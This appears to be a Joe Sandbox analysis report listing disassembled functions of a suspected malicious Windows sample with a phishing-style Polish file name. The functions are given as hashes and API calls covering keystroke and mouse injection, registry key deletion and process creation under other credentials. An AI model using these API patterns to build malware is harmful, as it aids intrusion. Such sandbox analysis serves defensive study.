                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                                                                                                                                                                                                                      • API String ID: 2574300362-3261711971
                                                                                                                                                                                                                                                      • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                                                                                                                                                                                      • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                                                                                                                                                                                      • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                                                                                                                                                                                                                                      • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                                                                                                                                                                                                                      • SendInput.USER32 ref: 0044C6E2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2221674350-0
                                                                                                                                                                                                                                                      • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                                                                                                                                                      • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _wcscpy$_wcscat
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2037614760-0
                                                                                                                                                                                                                                                      • Opcode ID: c3d60132d03e6e9aaf992afd40c569c0f32bb020d8b31a6b424623dccafdf89e
                                                                                                                                                                                                                                                      • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c3d60132d03e6e9aaf992afd40c569c0f32bb020d8b31a6b424623dccafdf89e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1726766782-0
                                                                                                                                                                                                                                                      • Opcode ID: 4e9d57439f7da7597e491875000a581c9c04313e1914f2eb0b98f23fec4f2b72
                                                                                                                                                                                                                                                      • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e9d57439f7da7597e491875000a581c9c04313e1914f2eb0b98f23fec4f2b72
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
                                                                                                                                                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 0044111A
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
                                                                                                                                                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 004411B3
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 642888154-0
                                                                                                                                                                                                                                                      • Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                                                                                                                                                                                      • Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1976402638-0
                                                                                                                                                                                                                                                      • Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                                                                                                                                                                                      • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 00442597
                                                                                                                                                                                                                                                        • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 004425BF
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 004425C6
                                                                                                                                                                                                                                                      • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                                                                                                                                                                                                                                        • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00442624
                                                                                                                                                                                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4137160315-0
                                                                                                                                                                                                                                                      • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                                                                                                                                                                                      • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0044961A
                                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 0044964A
                                                                                                                                                                                                                                                        • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 004496BA
                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 004496C7
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$_wcslen$_memset_wcspbrk
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1624073603-0
                                                                                                                                                                                                                                                      • Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                                                                                                                                                                                                      • Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1640429340-0
                                                                                                                                                                                                                                                      • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                                                                                                                                                                                      • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 752480666-0
                                                                                                                                                                                                                                                      • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                                                                                                                                                                      • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 0045527A
                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3275902921-0
                                                                                                                                                                                                                                                      • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                                                                                                                                                                                      • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                                                                                                                                                                                                      • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                                                                                                                                                                                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
